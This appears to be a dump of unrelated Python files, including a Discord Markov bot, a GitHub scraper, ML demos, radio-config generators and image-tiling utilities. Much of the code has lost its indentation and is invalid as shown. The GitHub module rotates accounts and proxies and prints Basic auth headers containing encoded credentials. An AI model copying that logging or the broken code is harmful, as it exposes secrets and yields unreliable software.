        self.assertEqual(recursive_get(dict([]), ['key']), None)
        self.assertEqual(recursive_get({'a': 1}, ['key']), None)
        self.assertEqual(recursive_get({'key': 1}, ['key']), 1)
        self.assertEqual(recursive_get({'key1': {'key3': 2}}, ['key1', 'key2']), None)
        self.assertEqual(recursive_get({'key1': {'key2': 2}}, ['key1', 'key2']), 2)
    def test_window(self):
        self.assertEqual(list(window([1, 2, 3], 2)), [(1, 2), (2, 3)])
    def test_listify(self):
        self.assertEqual(listify([1, 2, 3]), "\"1\",\"2\",\"3\"")
|
11548254
|
from objects.modulebase import ModuleBase
from objects.permissions import PermissionEmbedLinks
from utils.funcs import find_channel
from utils.formatters import trim_text
import random
from discord import Embed, Colour
class Module(ModuleBase):
usage_doc = '{prefix}{aliases} [channel]'
short_doc = 'Generate text using markov chain'
name = 'markov'
aliases = (name, 'markovchain')
category = 'Actions'
bot_perms = (PermissionEmbedLinks(), )
guild_only = True
async def on_call(self, ctx, args, **flags):
if len(args) == 1:
channel = ctx.channel
else:
channel = await find_channel(
args[1:], ctx.guild, global_id_search=True,
include_voice=False, include_category=False
)
if channel is None:
return await ctx.warn('Channel not found')
author = channel.guild.get_member(ctx.author.id)
if not author or not channel.permissions_for(author).read_messages:
return await ctx.error('You don\'t have permission to read messages in that channel')
if channel.is_nsfw() > ctx.channel.is_nsfw():
return await ctx.warn('Trying to access nsfw channel from sfw channel')
m = await ctx.send('Generating...')
try:
messages = await channel.history(
limit=1000, oldest_first=True,
before=ctx.message.edited_at or ctx.message.created_at
).flatten()
except Exception:
return await self.bot.edit_message(m, 'Failed to read message history')
words = [i for s in [m.content.split(' ') for m in messages if m.content] for i in s]
num_words = min((random.randint(5, 100), len(words)))
if num_words < 2:
return await self.bot.edit_message(
m, 'Not enough words to generate text')
pairs = [(words[i].lower(), words[i + 1]) for i in range(len(words) - 1)]
word_dict = {}
for word_1, word_2 in pairs:
if word_1 in word_dict:
word_dict[word_1].append(word_2)
else:
word_dict[word_1] = [word_2]
chain = [random.choice(words)]
for i in range(num_words):
word = chain[-1]
if word in word_dict:
next_word = random.choice(word_dict[word])
else:
next_word = random.choice(random.choice(tuple(word_dict.values())))
chain.append(next_word)
most_frequent_word = max(word_dict, key=lambda x: len(word_dict[x] if x else []))
e = Embed(colour=Colour.gold(), title='Markov Chain')
e.add_field(name='Channel', value=channel.mention)
e.add_field(name='Words analyzed', value=len(words))
e.add_field(
name='Most frequent word',
value=f'**{most_frequent_word[:256]}**: used **{len(word_dict[most_frequent_word])}** times ({round(len(word_dict[most_frequent_word]) / len(words), 4)}%)'
)
e.description = trim_text(' '.join(chain), max_len=2048)
e.set_footer(text=ctx.author, icon_url=ctx.author.avatar_url)
await self.bot.delete_message(m)
await ctx.send(embed=e)
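# --- Hedged illustration (not part of the original module) ---
# The core of the generator above, isolated from discord: build a first-order chain
# from consecutive word pairs, then walk it. The sample sentence is illustrative.
def _example_markov(text='the cat sat on the mat and the cat slept', length=8):
    words = text.split(' ')
    pairs = [(words[i].lower(), words[i + 1]) for i in range(len(words) - 1)]
    word_dict = {}
    for word_1, word_2 in pairs:
        word_dict.setdefault(word_1, []).append(word_2)
    chain = [random.choice(words)]
    for _ in range(length):
        word = chain[-1].lower()
        if word in word_dict:
            chain.append(random.choice(word_dict[word]))
        else:
            chain.append(random.choice(random.choice(tuple(word_dict.values()))))
    return ' '.join(chain)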
|
11548261
|
import base64
import json
import time
import requests
from Utility.CDPConfigValues import CDPConfigValues
class WebConstants:
"""
    Class definition for storing constants for authorization, URLs and
    headers used for data extraction and storage
"""
# Prepare authentication GitHub Header
github_base_url = "https://api.github.com/repos"
counter = 0
def __init__(self, project):
self.project_name = CDPConfigValues.cdp_projects[project]
self.commit_base_url = f"{WebConstants.github_base_url}/{self.project_name}/commits"
self.commit_url_paginated = self.commit_base_url + "?page={0}&per_page=100"
self.commit_details_url = self.commit_base_url + "/{0}"
self.commit_file_history_url = self.commit_base_url + "?path={0}"
self.issues_url = f"{WebConstants.github_base_url}/{self.project_name}/issues"
bug_label = CDPConfigValues.configFetcher.get('bug_label', project)
        self.bug_url = self.issues_url + f"?labels={bug_label}" + "&state=all&page={0}&per_page=100"
self.event_url = self.issues_url + "/{0}/events?page=0&per_page=100"
self.timeline_url = self.issues_url + "/{0}/timeline?page=0&per_page=100"
self.file_size_url = f"{WebConstants.github_base_url}/{self.project_name}/git/trees/" + "{0}?recursive=1"
        self.contribution_url = f"{WebConstants.github_base_url}/{self.project_name}/contributors" + "?page={}"
self.contents_url = f"{WebConstants.github_base_url}/{self.project_name}/contents/" + "{0}?ref={1}"
self.user_details_url = "https://api.github.com/users"
self.user_password = ""
self.header = ""
self.headers = {}
self.header_timer = {}
def fetch_header(self, header_type=None):
user_accounts = CDPConfigValues.github_username.split(",")
user_accounts = list(map(str.strip, user_accounts))
user_id = WebConstants.counter % len(user_accounts)
WebConstants.counter = WebConstants.counter + 1
githubPassword = CDPConfigValues.github_password
githubUserName = user_accounts[user_id]
encodedStr = githubUserName + ":" + githubPassword
if self.headers.get(f"{githubUserName}_{header_type}") is None or (
self.header_timer.get(f"{githubUserName}_{header_type}") is not None and
(time.time() - self.header_timer[f"{githubUserName}_{header_type}"]) > 3600):
self.header_timer[f"{githubUserName}_{header_type}"] = time.time()
            self.user_password = base64.b64encode(encodedStr.encode()).decode("ascii")  # base64-encode "user:password" for HTTP Basic auth
if header_type is None:
self.header = {'Accept': 'application/vnd.github.symmetra-preview+json',
'User-agent': 'Mozilla/5.0',
'Authorization': 'Basic %s' % self.user_password}
else:
self.header = {'Accept': 'application/vnd.github.mockingbird-preview', 'User-agent': 'Mozilla/5.0',
'Authorization': 'Basic %s' % self.user_password}
print(f"header: {self.header}")
self.headers[f"{githubUserName}_{header_type}"] = self.header
else:
return self.headers[f"{githubUserName}_{header_type}"]
return self.header
@staticmethod
def fetch_proxy():
# proxy_list = [
# "172.16.17.32:80", "172.16.17.32:80"
# ]
proxy_list = CDPConfigValues.proxy_list.split(",")
proxy_id = WebConstants.counter % len(proxy_list)
return f"http://{proxy_list[proxy_id]}"
if __name__ == "__main__":
# For testing purpose
webConstants = WebConstants("project_1")
webConstants.fetch_header()
webConstants.fetch_header()
webConstants.fetch_header()
webConstants.fetch_header()
webConstants.fetch_header()
|
11548267
|
import dash
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash()
app.layout = html.Div([
dcc.Graph(
id='graph-1',
figure={
'data': [{
'y': [1, 4, 3]
}],
'layout': {
'height': 800
}
}
),
html.Hr(),
dcc.Graph(
id='graph-2',
style={
'height': 800
},
figure={
'data': [{
'y': [1, 5, 2]
}]
}
)
])
if __name__ == '__main__':
app.run_server(debug=True)
|
11548268
|
import os
import yaml
from pylib_multi_phy_model.multi_phy_configuration_model import fileType
from rail_scripts.generators.railConfig_sourceCodeGenerator import RAILConfig_generator
from rail_scripts.generators.railTest_rmrCommandGenerator import RailTest_rmrConfigGenerator
from rail_scripts.rail_adapter import RAILAdapter
class RAILScriptsWrapper(object):
rail_signature_function = None
@staticmethod
def run_rail_scripts(multi_phy_model, generate_debug_yaml=False, output_filename="rail_config", internal=False, sign=False):
railAdapter = RAILAdapter(mphyConfig=multi_phy_model, adapter_name=multi_phy_model.rail_adapter_version)
railAdapter.populateModel()
if railAdapter._railModelPopulated == False:
return
# Debug yaml file
if generate_debug_yaml:
railModelContext = railAdapter.generateRailModelContext()
rail_model_out = yaml.dump(railModelContext)
multi_phy_model.output_files.file.append(fileType("rail_model.yml", rail_model_out))
# Setup the context for the rail config generator
context = {'rail_internal': internal,
'enable_timing': internal,
'filename': output_filename}
# Add commit information to internal builds assuming we're in a git
# repo and have access to this.
if internal:
railAdapterPath = os.path.abspath(RAILAdapter.current_dir)
context['ra_commit'] = os.popen("git -C {} rev-parse HEAD".format(os.path.join(railAdapterPath))).read()[0:10]
context['rc_commit'] = os.popen("git -C {} rev-parse HEAD".format(os.path.join(railAdapterPath, "..", ".."))).read()[0:10]
# If a signature is requested then use the rail_signature_function to do
# that. We need to ensure that something has set this function because
# it is kept external to this code intentionally.
if sign:
assert RAILScriptsWrapper.rail_signature_function != None, "No signature function available!"
railModelContext = railAdapter.generateRailModelContext()
signatures = RAILScriptsWrapper.rail_signature_function(railModelContext)
railAdapter.setSignatures(signatures)
# Create and override the generator
generator = RAILConfig_generator(railAdapter)
generator.overrideContext(**context)
rail_config_h = generator.render(generator.template_path_h)
multi_phy_model.output_files.file.append(fileType("{}.h".format(output_filename), rail_config_h))
rail_config_c = generator.render(generator.template_path_c)
multi_phy_model.output_files.file.append(fileType("{}.c".format(output_filename), rail_config_c))
railtest_generator = RailTest_rmrConfigGenerator(railAdapter)
rail_railtest_commands = railtest_generator.render(railtest_generator.template_path_railtest)
multi_phy_model.output_files.file.append(fileType("rail_test_commands.txt", rail_railtest_commands))
@staticmethod
def dump_output_files(multi_phy_model, output_path):
if not os.path.exists(output_path):
os.makedirs(output_path, exist_ok=True)
for file in multi_phy_model.output_files.file:
file_path = os.path.join(output_path, file.name)
if os.path.exists(file_path):
os.remove(file_path)
            with open(file_path, 'w') as fc:
                print("Creating '{}'...".format(file_path))
                fc.write(file.source_code)
|
11548358
|
import unittest, sys, StringIO
sys.path.append('.')
from maestro import py_backend, exceptions, utils
from requests.exceptions import HTTPError
utils.setQuiet(True)
class TestContainer(unittest.TestCase):
    @unittest.skip("skipping")
def testStartStopRm(self):
p = py_backend.PyBackend()
c = p.create_container(utils.findImage('ubuntu'), {'command': '/bin/bash -c "while true; do echo hello world; sleep 60; done;"'})
state = p.docker_client.inspect_container(c)
self.assertFalse(state['State']['Running'])
p.start_container(c)
state = p.docker_client.inspect_container(c)
self.assertTrue(state['State']['Running'])
p.stop_container(c, 1)
state = p.docker_client.inspect_container(c)
self.assertFalse(state['State']['Running'])
p.remove_container(c, 1)
with self.assertRaises(HTTPError) as e:
p.docker_client.inspect_container(c)
self.assertEqual(str(e.exception), '404 Client Error: Not Found')
def testBuildImage(self):
dockerfile = """
FROM ubuntu
MAINTAINER test
"""
p = py_backend.PyBackend()
image_id = p.build_image(fileobj=StringIO.StringIO(dockerfile))[0]
self.assertEqual(p.inspect_image(image_id)['author'], 'test')
p.remove_image(image_id)
with self.assertRaises(HTTPError) as e:
p.inspect_image(image_id)
    @unittest.skip("skipping")
def testGetIpAddress(self):
# TODO: image_id will change
p = py_backend.PyBackend()
c = p.run_container(utils.findImage('ubuntu'), {'command': 'ps aux'})
self.assertIsNotNone(c)
self.assertIsNotNone(p.get_ip_address(c))
if __name__ == '__main__':
unittest.main()
|
11548382
|
from setuptools import setup
with open("README.rst", "r") as f:
long_description = f.read()
setup(name = "matterbabble",
packages = ["matterbabble"],
entry_points = {"console_scripts": ["matterbabble = matterbabble.__main__:main"]},
version = "1.0.1",
description = "Connect Discourse threads to Matterbridge.",
long_description = long_description,
author = "<NAME>",
author_email = "<EMAIL>",
url = "https://github.com/DeclanHoare/matterbabble",
classifiers = ("Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent"),
install_requires = ["aiohttp", "bidict", "commonmark", "commonmarkextensions"])
|
11548405
|
import pandas as pd
import numpy as np
import keras
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout, Flatten
#--------------------------------
num_classes = 3 #Iris-setosa,Iris-versicolor,Iris-virginica
#--------------------------------
def createNetwork():
model = Sequential()
model.add(Dense(4 #num of hidden units
, input_shape=(4,))) #num of features in input layer
model.add(Activation('sigmoid')) #activation function from input layer to 1st hidden layer
model.add(Dense(num_classes)) #num of classes in output layer
model.add(Activation('sigmoid')) #activation function from 1st hidden layer to output layer
return model
model = createNetwork()
model.compile(loss='categorical_crossentropy'
, optimizer=keras.optimizers.Adam(lr=0.007)
, metrics=['accuracy']
)
#--------------------------------
chunk_size = 30
epochs = 1000
for epoch in range(0, epochs): #epoch should be handled here, not in fit command!
if epoch % 100 == 0:
print("epoch ",epoch)
chunk_index = 0
for chunk in pd.read_csv("iris.data", chunksize=chunk_size
, names = ["sepal_length","sepal_width","petal_length","petal_width","class"]):
#print("current chunk: ",chunk_index*chunk_size)
current_set = chunk.values #convert df to numpy array
features = current_set[:,0:4]
labels = current_set[:,4]
for i in range(0,labels.shape[0]):
if labels[i] == 'Iris-setosa':
labels[i] = 0
elif labels[i] == 'Iris-versicolor':
labels[i] = 1
elif labels[i] == 'Iris-virginica':
labels[i] = 2
labels = keras.utils.to_categorical(labels, num_classes)
#------------------------------------
model.fit(features, labels, epochs=1, verbose=0) #epochs handled in the for loop above
chunk_index = chunk_index + 1
#-------------------------------------------
df = pd.read_csv("iris.data", names = ["sepal_length","sepal_width","petal_length","petal_width","class"])
for index, row in df.iterrows():
features = row.values[0:4]
actual_label = row.values[4]
prediction = model.predict(np.array([features]))
prediction = np.argmax(prediction)
if prediction == 0:
predicted_class = "Iris-setosa"
elif prediction == 1:
predicted_class = "Iris-versicolor"
elif prediction == 2:
predicted_class = "Iris-virginica"
if predicted_class != actual_label:
print("*", end='')
print(" prediction: ",predicted_class, " - actual: ",actual_label)
|
11548428
|
from bson.objectid import ObjectId
from project.infrastructure.constants.mongo_collections import Collections
from project.infrastructure.data_layer.data_access_adapter import MongoDataLayer
class ValidateAdress:
@staticmethod
async def this_address_has_exist(criteria: dict) -> bool:
data_layer = MongoDataLayer(Collections.person_address)
result = await data_layer.get_by_filter(criteria)
if len(result) > 0:
return True
return False
@staticmethod
async def this_address_is_active(_id: ObjectId) -> bool:
data_layer = MongoDataLayer(Collections.person_address)
result = await data_layer.get_by_id(_id)
if "status" in result and result["status"] == "active":
return True
return False
|
11548454
|
from nurses_2.app import App
from nurses_2.widgets.widget_data_structures import Anchor
from .tetris import Tetris
class TetrisApp(App):
async def on_start(self):
tetris = Tetris(pos_hint=(.5, .5), anchor=Anchor.CENTER)
self.add_widget(tetris)
tetris.modal_screen.enable(callback=tetris.new_game, is_game_over=True)
TetrisApp().run()
|
11548465
|
from pyradioconfig.calculator_model_framework.CalcManager import CalcManager
from pyradioconfig.calculator_model_framework.model_serializers.human_readable import Human_Readable
from pyradioconfig.calculator_model_framework.model_serializers.static_timestamp_xml import Static_TimeStamp_XML
import os.path
import shutil
#
#
#
def create_csv_file(output_filename=None):
# Hack to force part family and revision
part_family = "dumbo"
part_rev = "A0"
radio_configurator = CalcManager(part_family, part_rev)
phy_names = radio_configurator.getPhyNames()
output_lines = list()
# Generate header line
# Create an empty model starting from the base profile
model = radio_configurator.create_modem_model_instance(profile_name="Base")
output_line = "phy_name"
for var in model.vars:
output_line = output_line + ", " + var.name
output_lines.append(output_line)
# Now print the data for each phy
for phy_name in phy_names:
print("Generating line in csv file for: %s" % phy_name)
# Run the calculator to populate model
model = radio_configurator.calculate_phy(phy_name)
# Generate row of data
output_line = phy_name
for var in model.vars:
output_line = output_line + ", %s" % var.value
output_lines.append(output_line)
# Write the lines to a file if one was specified.
# Otherwise, we'll just return the list to the calling function
# to do what it wants with the list.
if output_filename is not None:
        with open(output_filename, 'w') as outputfile:
            for line in output_lines:
                outputfile.write('%s\n' % line)
else:
return output_lines
|
11548499
|
import FWCore.ParameterSet.Config as cms
totemTriggerRawToDigi = cms.EDProducer("TotemTriggerRawToDigi",
rawDataTag = cms.InputTag(""),
# IMPORTANT: leave 0 to load the default configuration from
# DataFormats/FEDRawData/interface/FEDNumbering.h
fedId = cms.uint32(0)
)
|
11548538
|
from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.util import Log
from echomesh.util.thread.MasterRunnable import MasterRunnable
from gittwit.twitter.Search import Loop
# Module-level logger used by the error calls below (assumes the echomesh Log helper's logger() factory).
LOGGER = Log.logger(__name__)
class MultiSearch(MasterRunnable):
def __init__(self, callback, interval=2, preload=1, name='MultiSearch'):
super(MultiSearch, self).__init__()
self.callback = callback
self.interval = interval
self.preload = preload
self.name = name
self.searches = {}
self.index = 0
def add(self, search):
if search in self.searches:
            LOGGER.error('Already searching %s', search)
else:
self.index += 1
loop = Loop(search, self.callback, self.interval, self.preload,
name = '%s:%s' % (self.name, self.index))
self.searches[search] = loop
self.add_slave(loop)
loop.run()
def remove(self, search):
loop = self.searches.get(search)
if loop:
del self.searches[search]
loop.stop()
self.remove_slave(loop)
else:
LOGGER.error('No search %s', search)
|
11548542
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class BookkeepingConfig(AppConfig):
name = "byro.bookkeeping"
class ByroPluginMeta:
document_categories = {
"byro.bookkeeping.receipt": _("Receipt"),
"byro.bookkeeping.invoice": _("Invoice"),
"byro.bookkeeping.account.statement": _("Statement"),
}
|
11548583
|
import torch
import numpy as np
import math
import util.const as const
import util.run_length as run_length
import util.submit as submit
__all__ = [ 'pad_image', 'generate_tile_names', 'get_tile_layout', 'get_img_name', 'get_tile', 'stitch_predictions', 'merge_preds_if_possible' ]
def remove_tile_borders(image, tile_borders):
'''
input:
        image: a PyTorch Variable of size (batch_size, num_channels, height, width)
        tile_borders: a tuple of ints (height_border, width_border)
output:
        image: a PyTorch Variable of size (batch_size, num_channels, height - 2 * tile_height_border, width - 2 * tile_width_border)
'''
tile_height_border, tile_width_border = tile_borders
assert tile_height_border >= 0
if tile_height_border > 0: # No need to remove border if it's 0
image = image[:, :, tile_height_border:-tile_height_border, :]
assert tile_width_border >= 0
if tile_width_border > 0: # No need to remove border if it's 0
image = image[:, :, :, tile_width_border:-tile_width_border]
image = image.contiguous()
return image
def get_tile_border(img_length, tile_length, num_tiles):
'''
input:
img_length: int representing either image height or width
tile_length: int representing either tile height or width
num_tiles: int representing how many tiles are along this dimension
output:
tile_border: int
Note that tile_border can be 0 when img_length == tile_length
Their relationships are:
Eq. 1
padded_img_length == img_length + 2 * tile_border
Eq. 2
padded_img_length == num_tiles * tile_length - (num_tiles - 1) * 2 * tile_border
Eq. 3
tile_body_length == tile_length - 2 * tile_border
Eq. 4
padded_img_length == num_tiles * tile_body_length + 2 * tile_border
'''
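    # Worked example (hypothetical numbers): img_length=1280, tile_length=704, num_tiles=2
    # gives tile_border = (2*704 - 1280) / (2*2) = 32; then padded_img_length = 1344 (Eq. 1),
    # tile_body_length = 640 (Eq. 3), and 2*640 + 2*32 = 1344, consistent with Eq. 4.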
# To solve for tile_border, combine and reorganize Eq. 1 and Eq. 2
tile_border = (num_tiles * tile_length - img_length) / (num_tiles * 2)
assert tile_border >= 0 and tile_border % 1 == 0
tile_border = int(tile_border)
# Verify tile_border we got is right
padded_img_length = img_length + 2 * tile_border # Eq. 1
tile_body_length = tile_length - 2 * tile_border # Eq. 3
assert padded_img_length == num_tiles * tile_body_length + 2 * tile_border # Eq. 4
return tile_border
def get_tile_layout(tile_size, img_size):
'''
input:
tile_size: a tuple of ints (height, width) representing the size of a tile
img_size: a tuple of ints (height, width) representing the size of a whole image
output:
tile_layout: a tuple of ints (num_of_rows, num_of_cols)
tile_border: a tuple of ints (height_border, width_border)
'''
tile_height, tile_width = tile_size
img_height, img_width = img_size
num_of_rows = math.ceil(img_height / tile_height )
num_of_cols = math.ceil(img_width / tile_width )
tile_layout = (num_of_rows, num_of_cols)
height_border = get_tile_border(img_height, tile_height, num_of_rows)
width_border = get_tile_border(img_width, tile_width, num_of_cols)
tile_border = (height_border, width_border)
return tile_layout, tile_border
def generate_tile_names(img_names, tile_size, img_size):
'''
input:
img_names: a list of strings consisting of all image names
tile_size: a tuple of ints (height, width) representing the size of a tile
img_size: a tuple of ints (height, width) representing the size of a whole image
output:
tile_names: a list of strings consisting of all image tile names in img_name-<row_idx>-<col_idx> format
'''
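    # Example (hypothetical name): with a 2x3 tile layout, an image named 'img_001' yields
    # 'img_001-1-1', 'img_001-1-2', 'img_001-1-3', 'img_001-2-1', ... (row/col indices are 1-based).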
tile_layout, _ = get_tile_layout(tile_size, img_size)
num_of_rows, num_of_cols = tile_layout
tile_names = []
for img_name in img_names:
tile_names_in_img = []
for row_idx in range(1, num_of_rows+1):
for col_idx in range(1, num_of_cols + 1):
tile_name = img_name + '-' + str(row_idx) + '-' + str(col_idx)
tile_names_in_img.append(tile_name)
tile_names += tile_names_in_img
return tile_names
def get_img_name(tile_name):
'''
get whole image name from tile name
'''
return tile_name.split('-')[0]
def get_tile_pos(tile_name):
tile_row_idx, tile_col_idx = tile_name.split('-')[1], tile_name.split('-')[2]
tile_pos = int(tile_row_idx), int(tile_col_idx)
return tile_pos
def get_tile(img, tile_name, tile_size):
'''
get tile from image
'''
img_size = img.shape[1:]
tile_layout, tile_border = get_tile_layout(tile_size, img_size)
tile_pos = get_tile_pos(tile_name)
tile = crop_tile(img, tile_pos, tile_size, tile_layout, tile_border)
return tile
def pad_image(img, paddings):
height_padding, width_padding = paddings
channel_padding = (0, 0)
height_padding = (height_padding, height_padding)
width_padding = (width_padding, width_padding)
padded_img = np.lib.pad(img, (channel_padding, height_padding, width_padding), 'constant')
return padded_img
def remove_paddings(mask, paddings):
'''
input:
mask: numpy array of shape (height, width)
paddings: tuple of ints, (height_padding, width_padding)
'''
height_padding, width_padding = paddings
assert height_padding >= 0
if height_padding > 0: # No need to remove padding if it's 0
mask = mask[height_padding:-height_padding, :]
assert width_padding >= 0
if width_padding > 0: # No need to remove padding if it's 0
mask = mask[:, width_padding:-width_padding]
return mask
def crop_tile(img, tile_pos, tile_size, tile_layout, tile_border):
'''
    crop a tile from an image
'''
padded_img = pad_image(img, tile_border)
# unpack inputs
num_of_rows, num_of_cols = tile_layout
_, img_height, img_width = img.shape
row_idx, col_idx = tile_pos
tile_h, tile_w = tile_size
height_border, width_border = tile_border
t_body_h, t_body_w = tile_h - 2 * height_border, tile_w - 2 * width_border
# print('Tile Size: {}, {}'.format(tile_h, tile_w))
# print('Tile Border: {}, {}'.format(height_border, width_border))
# print('Tile Body: {}, {}'.format(t_body_h, t_body_w))
crop_y_start = (row_idx - 1) * t_body_h
crop_x_start = (col_idx - 1) * t_body_w
if row_idx == num_of_rows: # if the tile is in last row
# leave all remainder to the last tile
crop_y_end = img_height + 2*height_border
else:
crop_y_end = crop_y_start + t_body_h + 2*height_border
if col_idx == num_of_cols: # if the tile is in last col
# leave all remainder to the last tile
crop_x_end = img_width + 2*width_border
else:
crop_x_end = crop_x_start + t_body_w + 2*width_border
cropped_img = padded_img[ :, crop_y_start:crop_y_end, crop_x_start:crop_x_end ]
return cropped_img
def merge_preds_if_possible(exp_name, tile_probs, paddings, img_rles, is_ensemble=False, ensemble_dir=None, reverse_test_time_aug=None):
'''
input:
        tile_probs: a dict of numpy arrays, with image tile names as keys and predicted probability maps as values
img_rles: a dict of strings, with image names as keys and predicted run-length-encoded masks as values
is_ensemble: a boolean indicating if this is in ensemble mode or not
        reverse_test_time_aug: a function that reverses the test-time augmentation applied to the input test image
'''
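    # Flow: once every tile of an image has a predicted map, stitch the tiles back into the
    # padded image, strip the padding, optionally undo test-time augmentation, then either save
    # the probability map (ensemble mode) or threshold it at 0.5 and run-length encode the mask.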
if is_ensemble:
assert img_rles is None
assert ensemble_dir is not None
else:
assert img_rles is not None
assert reverse_test_time_aug is None # Never do Test Time augmentation right before submitting
if len(tile_probs) == 0:
return
# get tile names of computed probability maps
tile_names = list(tile_probs.keys())
    # compute the number of tiles in an image
tile_size = tile_probs[tile_names[0]].shape[1:]
padded_img_size = np.add(const.img_size, np.multiply(paddings, 2))
tile_layout, _ = get_tile_layout(tile_size, padded_img_size)
num_of_rows, num_of_cols = tile_layout
num_tiles = num_of_rows * num_of_cols
# get image names from tile names
tiles_by_imgs = group_tile_names(tile_names)
img_names = tiles_by_imgs.keys()
for img_name in img_names:
if len(tiles_by_imgs[img_name]) == num_tiles:
# all tiles of this image are here and ready to be merged
tile_probs_of_one_image = create_dict_from_dict(tiles_by_imgs[img_name], tile_probs)
img_prob = merge_tiles(tile_probs_of_one_image, tile_layout)
# merged into whole image with shape: (1280, 1920)
img_prob = remove_paddings(img_prob, paddings)
assert img_prob.shape == const.img_size # image shape: (1280, 1918)
# undo applied data augmentation for Test Time Augmentation
if reverse_test_time_aug is not None:
img_prob = reverse_test_time_aug(img_prob)
if is_ensemble:
# save predictions
submit.save_prob_map(ensemble_dir, img_name, img_prob)
else:
# generate image mask from image probability map
img_mask = np.zeros(img_prob.shape)
img_mask[img_prob > 0.5] = 1
# employ Run Length Encoding
img_rles[img_name] = run_length.encode(img_mask)
# remove merged tiles from tile_probs
remove_keys_from_dict(tiles_by_imgs[img_name], tile_probs)
return
def group_tile_names(tile_names):
'''
input:
tile_names: a list of strings, tile names of all images
output:
        tiles_by_imgs: a dict with image names as keys and the tile names of an image as values
'''
tiles_by_imgs = {}
for tile_name in tile_names:
img_name = get_img_name(tile_name)
if img_name not in tiles_by_imgs:
tiles_by_imgs[img_name] = [tile_name]
else:
tiles_by_imgs[img_name].append(tile_name)
return tiles_by_imgs
def create_dict_from_dict(some_keys, large_dict):
'''
from:
https://stackoverflow.com/questions/3420122/filter-dict-to-contain-only-certain-keys
'''
small_dict = { a_key: large_dict[a_key] for a_key in some_keys }
return small_dict
def remove_keys_from_dict(some_keys, dictionary):
'''
from:
https://stackoverflow.com/questions/8995611/removing-multiple-keys-from-a-dictionary-safely
'''
for a_key in some_keys:
dictionary.pop(a_key, None)
return
def merge_tiles(tile_masks, tile_layout):
'''
input:
tile_masks: a dict of numpy arrays, with tile names of a certain image as keys and their predicted masks as values
tile_layout: a tuple of ints
output:
img_mask: a numpy array
'''
tile_names = list(tile_masks.keys())
num_of_rows, num_of_cols = tile_layout
assert len(tile_names) == num_of_rows * num_of_cols
_, tile_height, tile_width = tile_masks[tile_names[0]].shape
img_mask = np.zeros((num_of_rows * tile_height, num_of_cols * tile_width))
for tile_name in tile_names:
tile_row_idx, tile_col_idx = get_tile_pos(tile_name)
start_y = (tile_row_idx - 1) * tile_height
start_x = (tile_col_idx - 1) * tile_width
end_y = tile_row_idx * tile_height
end_x = tile_col_idx * tile_width
img_mask[start_y:end_y, start_x:end_x] = tile_masks[tile_name]
return img_mask
|
11548590
|
import os
__version_path = os.path.join(
os.path.abspath(
os.path.dirname(__file__)),
'version.txt',
)
with open(__version_path, 'r') as f:
__version__ = f.read()
default_app_config = 'wizard_builder.apps.WizardBuilderConfig'
|